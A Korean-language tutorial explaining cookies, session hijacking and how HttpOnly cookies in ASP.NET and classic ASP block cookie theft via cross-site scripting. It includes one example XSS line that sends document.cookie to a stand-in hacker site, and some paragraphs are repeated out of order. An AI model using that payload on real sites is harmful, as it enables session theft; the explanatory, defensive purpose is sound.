security

Cookie에 대한 이해

쿠키는 ASP.NET, PHP와 같은 특정 기술영역에 국한된 것도 아니고, 특정 Client나 Server에만 국한된 기술도 아닙니다. 쿠키는 수십 년 전부터 사용되어 왔으며 최근에는 HTTP에 있어서 없어서는 안될 정도로 광범위하게 이용되고 있습니다. 어떠한 서버도 HTTP통신을 한다면 쿠키를 주고 받을 수 있으며, 클라이언트에서도 쿠키에 접근하고 관리할 수 있습니다. 또한 HTTP와 HTTPS사이에도 쿠키를 교환할 수 있으며, 같은 도메인이라면 서로 다른 Scheme일지라도 쿠키를 공유할 수 있습니다.

쿠키는 서버에서도, 클라이언트에서도 생성할 수 있습니다. 일단 쿠키가 한번 생성되면 브라우저는 해당 쿠키 정보를 기억하게 됩니다. 그리고 이후의 모든 요청(Request)에 쿠키를 포함하여 서버로 전달합니다. 서버는 브라우저의 요청(Request)에 포함된 쿠키를 읽어 들일 수 있습니다.

쿠키를 이해하는데 있어 가장 중요한 부분 중 하나는 쿠키로 인해 야기되는 보안위협에 대해 이해하는 것입니다. 수많은 사이트들에서 민감한 개인정보를 쿠키에 저장하고 있으며, 해커들은 다양한 방법으로 이 쿠키를 탈취하고자 하기 때문입니다. 이러한 쿠키에 대한 보안 공격 중 가장 대중적인 것 중 하나는 바로 세션 하이재킹(Session hijacking) 공격 입니다.

알다시피 HTTP는 Stateless 프로토콜입니다. HTTP는 기본적으로 상태정보를 기억하지 못하기 때문에, 서버는 요청자가 누구인지, 같은 사람인지 다른 사람인지 식별 할 수 없습니다. 이러한 문제를 해결하기 위해, 서버는 사용자 식별정보를 쿠키에 저장하며, 쿠키에 저장된 정보를 통해 각 사용자를 구별합니다. 예를 들면, ASP.NET 서버는 사용자 마다 유일키를 생성하여 .ASPXAUTH라는 이름의 쿠키에 저장하며, 이를 통해 사용자를 식별합니다.

.ASPXAUTH=4A10163C1F3299AAADF4C90B2F56AE90F1502CF86CDE4F026A422D7820732A66445B16EECC79B47EEF4F4EF36CB7BF9AFD2A
[브라우저의 쿠키에 저장된 사용자 식별정보]

따라서 해커가 다른 사용자의 쿠키를 탈취하게 된다면, 해커는 쿠키에 포함된 사용자 식별정보를 바탕으로 다른 사용자로 위장 할 수 있게 됩니다. 서버는 쿠키를 바탕으로 사용자를 식별하기 때문에, 요청을 보낸 사람이 해커인지 알 수 가 없으며 모든 권한을 내어주게 됩니다.

쿠키를 훔치는 방법은 다양합니다. 예를 들면 공공 Wifi망의 통신패킷을 분석하거나, ISP사업자의 통신케이블을 감청하는 방법도 있습니다. 아니면, 사용자 컴퓨터에 심은 해킹프로그램을 통해 쿠키를 가로채는 방법도 있습니다.

HTTP Only Cookies

쿠키는 클라이언트에서 자바스크립트로 조회할 수 있기 때문에, 해커들은 자바스크립트로 쿠키를 가로채고자 시도를 하게 됩니다. 가장 대표적인 공격 중 하나가 CSS(Cross Site Scripting) 입니다.

location.href = 'http://해커사이트/?cookies=' + document.cookie;

해커가 위와 같은 게시물을 공개게시판에 작성할 경우, 이 게시물을 읽은 다른 사용자는 알아차리기도 전에 자신의 모든 쿠키를 해커에게 전송하게 됩니다.

이러한 CSS 취약점을 해결하는 방법은, 바로 브라우저에서 쿠키에 접근할 수 없도록 제한하는 것입니다. 이러한 역할을 하는 것이 바로 HTTP Only Cookie입니다. 개발자가 다음과 같이 간단한 접미사를 쿠키생성코드에 추가함으로써 활성화 할 수 있습니다.


가장 마지막에 HttpOnly라는 접미사만 추가함으로써 HTTP Only Cookie가 활성화 되며, 위에서 말한 XSS와 같은 공격이 차단되게 됩니다.
HTTP Only Cookie를 설정하면 브라우저에서 해당 쿠키로 접근할 수 없게 되지만, 쿠키에 포함된 정보의 대부분이 브라우저에서 접근할 필요가
없기 때문에 HTTP Only Cookie는 기본적으로 적용하는 것이 좋습니다.

ASP.NET상에서 HTTP Only Cookie를 설정하는 방법은 매우 간단합니다. 쿠키를 추가하실 때 HttpOnly 속성을 true로 설정하시면 됩니다.

 Response.Cookies.Add(new HttpCookie("쿠키명")
{
 Value = "쿠키 값",
 HttpOnly = true
});

HttpOnly의 기본값은 false입니다. 만약 기본값을 true로 설정하시려면 web.config에서 다음과 같이 수정하시면 됩니다.
 
<httpCookies httpOnlyCookies="true" />


Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly

가장 마지막에 HttpOnly라는 접미사만 추가함으로써 HTTP Only Cookie가 활성화 되며, 위에서 말한 XSS와 같은 공격이 차단되게 됩니다. HTTP Only Cookie를 설정하면 브라우저에서 해당 쿠키로 접근할 수 없게 되지만, 쿠키에 포함된 정보의 대부분이 브라우저에서 접근할 필요가 없기 때문에 HTTP Only Cookie는 기본적으로 적용하는 것이 좋습니다.

ASP.NET상에서 HTTP Only Cookie를 설정하는 방법은 매우 간단합니다. 쿠키를 추가하실 때 HttpOnly 속성을 true로 설정하시면 됩니다.

모든 ASP 페이지의 상단에 아래처럼 웹페이지 헤더값을 추가함으로써 간단하게 처리 할 수도 있다.

Response.AddHeader "Set-Cookie", ""&CStr(Request.ServerVariables("HTTP_COOKIE"))&";path=/;HttpOnly"&""